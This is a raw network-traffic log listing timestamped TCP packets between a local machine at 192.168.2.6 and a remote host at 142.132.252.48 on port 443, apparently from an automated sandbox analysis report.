                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.198551893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.198595047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.204076052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.204101086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.204154015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.204163074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.204176903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.204205036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.224737883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.224761009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.224839926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.224864960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.224910975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.230650902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.230671883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.230727911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.230751991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.230798006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.238775969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.238797903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.238872051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.238886118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.238929987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.244504929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.244529963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.244580984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.244607925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.244626999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.244676113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.250119925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.250144005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.250200987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.250211000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.250260115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.255820990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.255841970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.255892038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.255907059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.255920887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.255951881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.284830093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.400501966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.400527954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.400568962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.400578022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.400624990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.405590057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.405622959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.405678988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.405685902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.405698061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.405725956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.407692909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.426100016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.426131964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.426260948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.426290989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.426337004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.431029081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.431055069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.431143045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.431150913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.431193113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.437570095 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.440346003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.440371990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.440455914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.440465927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.440511942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.446070910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.446096897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.446162939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.446168900 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.446217060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.451605082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.451632023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.451673985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.451678991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.451715946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.451735973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.456595898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.456614017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.456671953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.456676960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.456708908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.456733942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.477299929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.601707935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.601739883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.601861954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.601876020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.601926088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.606931925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.606951952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.607000113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.607011080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.607043028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.607062101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.627320051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.627338886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.627439022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.627448082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.627489090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.633008003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.633028030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.633071899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.633084059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.633105040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.633126974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.641870022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.641890049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.641951084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.641957998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.642038107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.646805048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.646821976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.646895885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.646903992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.646950960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.652662992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.652682066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.652770042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.652776957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.652827024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.658188105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.658217907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.658276081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.658284903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.658305883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.658324957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.803248882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.803278923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.803345919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.803354979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.803368092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.803400040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.808101892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.808128119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.808173895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.808181047 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.808217049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.808231115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.828439951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.828460932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.828552008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.828557968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.828604937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.834287882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.834306002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.834378004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.834397078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.834439039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.843271971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.843292952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.843364954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.843374968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.843414068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.848839045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.848856926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.848922014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.848928928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.848965883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.853929996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.853949070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.853996992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.854001999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.854022026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.854037046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.858805895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.859814882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.859832048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.859869957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.859878063 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.859920025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.859920025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:19.959770918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.004354000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.004379988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.004425049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.004434109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.004479885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.010082006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.010103941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.010175943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.010183096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.010222912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.031213045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.031230927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.031323910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.031330109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.031398058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.036199093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.036215067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.036281109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.036286116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.036323071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.044588089 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.044697046 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.044713020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.044770956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.044778109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.044819117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.050262928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.050281048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.050340891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.050347090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.050384998 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.055963039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.055979967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.056041002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.056047916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.056088924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.060893059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.060909986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.060971022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.060980082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.061022997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.118746042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.206058979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.206090927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.206181049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.206197023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.206238985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.211752892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.211770058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.211827993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.211834908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.211886883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.220536947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.232526064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.232542992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.232603073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.232609034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.232646942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.238487959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.238502979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.238565922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.238570929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.238609076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.244059086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.245917082 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.245935917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.245995045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.246000051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.246040106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.250273943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.251627922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.251646996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.251698971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.251703978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.251744032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.257307053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.257330894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.257396936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.257401943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.257451057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.262288094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.262310028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.262357950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.262362957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.262398958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.262972116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.407381058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.407398939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.407452106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.407460928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.407507896 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.412210941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.412226915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.412277937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.412283897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:20.412329912 CET49721443192.168.2.6142.132.252.48
